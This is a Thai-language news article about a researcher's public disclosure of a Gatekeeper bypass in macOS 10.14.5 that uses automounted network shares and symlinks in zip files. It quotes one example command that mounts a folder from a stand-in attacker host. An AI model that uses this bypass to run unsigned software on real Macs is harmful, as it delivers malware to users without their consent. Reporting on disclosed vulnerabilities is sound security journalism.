อมายา โตมาน นักวิจัยด้านความปลอดภัย Filippo Cavallarin โพสต์คำเตือนเกี่ยวกับจุดบกพร่องใน macOS 10.14.5 ในบล็อกของเขา ประกอบด้วยความเป็นไปได้ที่จะเลี่ยงมาตรการรักษาความปลอดภัยของ Gatekeeper โดยสิ้นเชิง ตาม Cavallarin เขาชี้ให้เห็นข้อผิดพลาดกับ Apple แล้วในเดือนกุมภาพันธ์ของปีนี้ แต่บริษัทไม่ได้แก้ไขในการอัปเดตล่าสุด
Gatekeeper ได้รับการพัฒนาโดย Apple และรวมเข้ากับระบบปฏิบัติการเดสก์ท็อปเป็นครั้งแรกในปี 2012 เป็นกลไกที่ป้องกันไม่ให้แอปพลิเคชันทำงานโดยที่ผู้ใช้ไม่ทราบและยินยอม หลังจากที่คุณดาวน์โหลดแอปแล้ว Gatekeeper จะตรวจสอบโค้ดโดยอัตโนมัติเพื่อดูว่าซอฟต์แวร์ได้รับการลงนามโดย Apple อย่างถูกต้องหรือไม่
มันอาจจะเป็น สนใจคุณ
ในบล็อกโพสต์ของเขา Cavallarin ระบุว่าตามค่าเริ่มต้น Gatekeeper จะถือว่าทั้งที่จัดเก็บข้อมูลภายนอกและการแชร์เครือข่ายเป็นตำแหน่งที่ปลอดภัย แอปพลิเคชันใด ๆ ที่อยู่ในเป้าหมายเหล่านี้จึงสามารถเปิดใช้งานได้โดยอัตโนมัติโดยไม่ต้องผ่านการตรวจสอบ Gatekeeper เป็นคุณลักษณะนี้ที่สามารถนำไปใช้ในการเปิดซอฟต์แวร์ที่เป็นอันตรายโดยที่ผู้ใช้ไม่ทราบ
แง่มุมหนึ่งที่อนุญาตการเข้าถึงโดยไม่ได้รับอนุญาตคือคุณสมบัติการติดตั้งอัตโนมัติ ซึ่งช่วยให้ผู้ใช้สามารถติดตั้งเครือข่ายที่ใช้ร่วมกันได้โดยอัตโนมัติ เพียงแค่ระบุเส้นทางที่ขึ้นต้นด้วย "/net/" ตามตัวอย่าง Cavallarin อ้างอิงเส้นทาง "ls /net/evil-attacker.com/sharedfolder/" ซึ่งอาจทำให้ระบบปฏิบัติการโหลดเนื้อหาของโฟลเดอร์ "sharefolder" ในตำแหน่งระยะไกลที่อาจเป็นอันตรายได้
คุณสามารถดูวิธีการทำงานของภัยคุกคามได้ในวิดีโอ:
อีกปัจจัยหนึ่งคือความจริงที่ว่าหากมีการแชร์ไฟล์ zip ที่มี symlink เฉพาะที่นำไปสู่ฟังก์ชัน automount Gatekeeper จะไม่ตรวจสอบมัน ด้วยวิธีนี้ เหยื่อสามารถดาวน์โหลดเอกสารที่เป็นอันตรายและคลายซิปได้อย่างง่ายดาย ทำให้ผู้โจมตีสามารถเรียกใช้ซอฟต์แวร์แทบทุกชนิดบน Mac โดยที่ผู้ใช้ไม่รู้ตัว Finder ซึ่งซ่อนส่วนขยายบางอย่างไว้ตามค่าเริ่มต้น ก็มีส่วนแบ่งของช่องโหว่นี้เช่นกัน
Cavallarin กล่าวในบล็อกของเขาว่า Apple ดึงความสนใจไปที่ช่องโหว่ของระบบปฏิบัติการ macOS เมื่อวันที่ 22 กุมภาพันธ์ของปีนี้ แต่ในช่วงกลางเดือนพฤษภาคม Apple หยุดสื่อสารกับ Cavallarin ดังนั้น Cavallarin จึงตัดสินใจเปิดเผยข้อมูลทั้งหมดต่อสาธารณะ
แหล่งที่มา: เอฟซีวีแอล
